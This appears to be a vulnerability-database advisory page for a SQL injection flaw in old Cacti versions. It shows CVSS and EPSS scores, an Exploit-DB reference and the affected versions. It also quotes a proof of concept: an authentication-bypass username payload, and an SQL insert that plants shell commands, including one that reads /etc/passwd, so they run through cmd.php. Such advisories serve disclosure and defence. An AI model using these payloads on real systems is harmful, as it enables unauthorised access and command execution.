Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 24375
Publication date : 2004-07-15
22h00 +00:00
Author : Fernando Quintero
EDB Verified : Yes
source: https://www.securityfocus.com/bid/10960/info
RaXnet Cacti is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the auth_login.php script due to a failure of the application to properly sanitize user-supplied "username" URI parameter input before using it in an SQL query.
It is demonstrated that an attacker may exploit this vulnerability in order to bypass the authentication interface used by Cacti.
username = admin' or '6'='6
password = password wished
insert into data_input_data_cache (local_data_id, host_id,
data_input_id, action, command, hostname, snmp_community,
snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout,
rrd_name, rrd_path, rrd_num, arg1, arg2, arg3)
values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some
script', '127.0.0.1', '', '1', '', '', '161', '500',
'hack', '/', '3', 'NULL', 'NULL', 'NULL');
Then points to http://www.example.com/cacti/cmd.php and the command will be
executed.
Products Mentioned
Configuraton 0
The_cacti_group>>Cacti >> Version 0.6
The_cacti_group>>Cacti >> Version 0.6.1
The_cacti_group>>Cacti >> Version 0.6.2
The_cacti_group>>Cacti >> Version 0.6.3
The_cacti_group>>Cacti >> Version 0.6.4
The_cacti_group>>Cacti >> Version 0.6.5
The_cacti_group>>Cacti >> Version 0.6.6
The_cacti_group>>Cacti >> Version 0.6.7
The_cacti_group>>Cacti >> Version 0.6.8
The_cacti_group>>Cacti >> Version 0.6.8a
The_cacti_group>>Cacti >> Version 0.8
The_cacti_group>>Cacti >> Version 0.8.1
The_cacti_group>>Cacti >> Version 0.8.2
The_cacti_group>>Cacti >> Version 0.8.2a
The_cacti_group>>Cacti >> Version 0.8.3
The_cacti_group>>Cacti >> Version 0.8.3a
The_cacti_group>>Cacti >> Version 0.8.4
The_cacti_group>>Cacti >> Version 0.8.5
The_cacti_group>>Cacti >> Version 0.8.5a
Configuraton 0
Gentoo>>Linux >> Version 1.4
References